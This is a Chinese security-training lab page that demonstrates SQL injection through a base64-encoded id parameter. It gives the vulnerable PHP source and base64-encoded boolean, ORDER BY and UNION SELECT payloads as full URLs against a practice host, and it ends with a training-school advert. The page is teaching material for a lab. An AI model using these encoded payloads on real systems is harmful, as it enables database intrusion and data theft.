MYSQL base64注入 实例演示 答案解析
以下信息调试输出,帮助您理解SQL注入,正常网站不显示
select * from admins where id = '1'
用户名 邮箱
必火网络安全 admin@bihuo.cn

什么是SQL注入
- (SQL Injection)是一种常见的Web安全漏洞,攻击者利用这个漏洞,可以访问或修改数据,或者利用潜在的数据库漏洞进行攻击。
1,是一种将SQL语句插入或添加到应用(用户)的输入参数中的攻击
2,这些参数传递给后台的SQL数据库服务器加以解析并执行

SQL注入分类
-- 按数据类型分类,
1,分为 整形注入 整型注入 (不需要闭合,大多数不需要注释符号)
2,字符串类型注入 (需要闭合,或者需要注释)

-- 按注入语法分类,
1,UNION query SQL injection(可联合查询注入)
2,Error-based SQL injection(报错型注入)
3,Boolean-based blind SQL injection(布尔型注入)
4,Time-based blind SQL injection(基于时间延迟注入)
5,Stacked queries SQL injection(可多语句查询注入)
链接:http://www.nanhack.com/payload/sql/base64.php?id=MQ==
字符串“MQ==”经过base64解码之后是数字1
1' and 1=1-- - 经过base64编码之后是 MScgYW5kIDE9MS0tIC0=
1' and 1=2-- - 经过base64编码之后是 MScgYW5kIDE9Mi0tIC0=
执行两个链接:
http://www.nanhack.com/payload/sql/base64.php?id=MScgYW5kIDE9MS0tIC0= # 页面正常
http://www.nanhack.com/payload/sql/base64.php?id=MScgYW5kIDE9Mi0tIC0= # 页面不正常
说明存在SQL注入,程序源码如下:
$id = base64_decode($_GET['id']);
$sql = "select * from admins where id = '$id'";
我们传入的base64编码会自动解码
接下来判断显示位:
# base64编码 1' order by 8-- - MScgb3JkZXIgYnkgOC0tIC0=
http://www.nanhack.com/payload/sql/base64.php?id=MScgb3JkZXIgYnkgOC0tIC0= #页面正常
# base64编码 1' order by 9-- - MScgb3JkZXIgYnkgOS0tIC0=
http://www.nanhack.com/payload/sql/base64.php?id=MScgb3JkZXIgYnkgOS0tIC0= #页面不正常,则显示位为8 # 这里要注意,注释符号是-- - 而不是-- + ,因为+号 base64编码之后,浏览器不会转成空格,带入数据库还是+号,所以这里用-- -

联合查询
-1' UNION SELECT 1,2,3,4,5,6,7,8-- - 经过编码后是 LTEnIFVOSU9OIFNFTEVDVCAxLDIsMyw0LDUsNiw3LDgtLSAt
http://www.nanhack.com/payload/sql/base64.php?id=LTEnIFVOSU9OIFNFTEVDVCAxLDIsMyw0LDUsNiw3LDgtLSAt# 可以看到显示位是2,4
-1' UNION SELECT 1,database(),3,user(),5,6,7,8-- - 经过编码后是 LTEnIFVOSU9OIFNFTEVDVCAxLGRhdGFiYXNlKCksMyx1c2VyKCksNSw2LDcsOC0tIC0=
http://www.nanhack.com/payload/sql/base64.php?id=LTEnIFVOSU9OIFNFTEVDVCAxLGRhdGFiYXNlKCksMyx1c2VyKCksNSw2LDcsOC0tIC0= #得到库名 nanhack 用户名nanhack

同样的方法,爆表,爆数据:

这个就和前面的联合查询注入一样,只不过我们需要对他进行base64编码在进行传值,这里就不再演示了
必火安全祝您学习愉快,有想学习安全的亲戚朋友、或者薪资低想转行的大学毕业生,可以推荐到必火来,必火网络安全教学可靠、就业无忧

必火安全学院

报名微信:nvhack



© Copyright 2021 版权所有(一极教育科技有限公司)   津公网安备 12011602000477号 津ICP备17008032号-2   网络安全培训、企业合作、院校合作: 15320004362(手机同微信)